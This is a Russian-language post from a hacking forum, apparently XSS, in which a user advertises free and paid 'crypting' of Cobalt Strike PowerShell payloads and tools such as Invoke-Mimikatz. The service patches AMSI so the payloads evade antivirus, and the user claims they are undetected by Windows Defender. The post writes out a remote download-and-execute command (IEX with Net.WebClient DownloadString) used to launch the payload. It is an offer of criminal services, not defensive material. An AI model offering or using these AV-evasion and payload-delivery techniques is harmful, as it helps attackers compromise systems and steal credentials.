• XSS.stack #1 – первый литературный журнал от юзеров форума

Бесплатно криптану Cobalt Strike ps1 или иной другой ps1 скрипт

В этой теме можно использовать автоматический гарант!

WhiteDragon

AMSI bypass
Пользователь
Регистрация
01.07.2021
Сообщения
165
Реакции
137
Депозит
0.0051
Есть обфускатор/кодогенератор, который патчит амси и запускает powershell скрипт, что позволяет обойти сигнатурный анализ антивирусов.
Провожу тесты своего движка на безвозмездной основе.

Например Вы генерируете payload Cobalt Strike в powershell скрипте и кидаете мне код. Я в свою очередь "криптую" и высылаю пш команду IEX (New-Object Net.WebClient).DownloadString('URL').
Исполнив эту команду Вы запускаете свой payload cobalt strike'а. Если антивирус детектит процесс powershell.exe и убивает, то через пару секунд сессия обратно восстанавливается после детекта.

Так же могу криптануть: Invoke-Mimikatz, Invoke-Inveigh, Invoke-ShareFinder и т.д. Список можно продолжать бесконечно.

p.s. Готов уйти в приват + открыт на сотрудничество.
p.s.s. за контактами в pm.
 
После моих тестов на вин 10 в корп ав - деф, коба стучит и выдает фуд.

Если Вам нужна чистка кобы( и не только ) с обходом дефа, то пишите в pm.
p.s. Всегда согласен на гаранта.
 


Напишите ответ...
Верх